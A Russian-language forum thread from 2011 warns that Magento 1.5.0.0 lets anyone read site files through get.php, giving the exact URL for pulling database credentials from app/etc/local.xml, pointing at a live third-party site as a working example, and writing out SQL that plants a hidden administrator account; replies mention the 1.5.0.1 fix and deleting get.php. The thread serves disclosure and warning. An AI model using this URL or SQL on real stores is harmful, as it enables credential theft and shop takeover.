Почему нельзя ставить Magento 1.5.0.0

[10 ноября 2016 г.]    Российская сборка Magento 2.49.12
Magento 2: модули и услуги
#1 Дмитрий Федюк
  • Администратор
  • Иконка
  • Группа: Администратор
  • Сообщений: 8884
  • Регистрация: 20.02.2010

10.02.2011 03:39

В эти дни в Лос-Анджелесе проходит широко разрекламированая международная конференция по Magento: Imagine eCommerce.
В связи с этим событием на разработчиков Magento, видимо, очень давило руководство: уж очень им хотелось приурочить выпуск Magento 1.5 к конференции.

Что ж, те и выпустили.
Однако, версия Magento 1.5.0.0, выпущенная вчера, содержит уязвимость безопасности: вы можете прочитать любой файл сайта на Magento 1.5.0.0, сформировав специальный URL.

Например, вы можете прочитать из файла app/etc/local.xml параметры подключения к базе данных:
http://<ваш сайт на Magento 1.5.0.0>/get.php/app/etc/local.xml


Рабочий пример (сайт magazento.com): http://magazento.com...p/etc/local.xml

Зная параметры подключения к базе данных, можно, не мудрствуя лукаво, сразу сделать себя администратором магазина, например :rolleyes::
INSERT INTO `admin_user` (`firstname`, `lastname`, `email`, `username`, `password`, `created`, `modified`, `logdate`, `lognum`, `reload_acl_flag`, `is_active`, `extra`) VALUES
('dfediuk', 'dfediuk', 'dfediuk@gmail.com', 'dfediuk', CONCAT(MD5('qXpassword'), ':qX'), '2009-02-16 09:07:53', '2009-10-23 12:50:52', '2010-01-27 06:13:37', 34, 0, 1, '');

INSERT INTO `admin_role` (`parent_id`, `tree_level`, `sort_order`, `role_type`, `user_id`, `role_name`) VALUES
(1, 2, 0, 'U', LAST_INSERT_ID(), 'dfediuk');


Хороший жизненный пример, почему программистов нельзя торопить, а если можно - чего потом стоит ожидать от своего сайта.
Разработчики Magento уже в курсе данного дефекта и час назад выпустили заплатку: Magento 1.5.0.1

#2 Дмитрий Белоруков
  • Группа: Заблокирован
  • Сообщений: 19
  • Регистрация: 03.02.2011

10.02.2011 10:12

зашибись. у меня как раз такая версия стоит.

#3 Vitalii
  • Группа: Пользователь
  • Сообщений: 6
  • Регистрация: 03.02.2011

11.02.2011 01:35

Цитата

Что ж, те и выпустили.
Однако, версия Magento 1.5.0.0, выпущенная вчера, содержит уязвимость безопасности: вы можете прочитать любой файл сайта на Magento 1.5.0.0, сформировав специальный URL.

Дмитрий Федюк Вот пробую прочитать свои файлы и ничего не могу открыть????
Пока не нашел той проблемы о которой вы говорите (Я только знакомлюсь с magento, может что не так сделал)
Вот можете проверить сами:
http://www.forumteremok.ru

#4 Дмитрий Федюк
  • Администратор
  • Иконка
  • Группа: Администратор
  • Сообщений: 8884
  • Регистрация: 20.02.2010

11.02.2011 01:44

Ваш сайт работает на Magento 1.5.0.1, а в заметке я пишу о Magento 1.5.0.0.

#5 Vitalii
  • Группа: Пользователь
  • Сообщений: 6
  • Регистрация: 03.02.2011

11.02.2011 09:02

Понял :)

#6 karser
  • Группа: Пользователь
  • Сообщений: 1
  • Регистрация: 18.02.2011

18.02.2011 15:44

Для устранения уязвимости проще всего удалить get.php из директории magento 1.5.0.0.

Поделиться темой: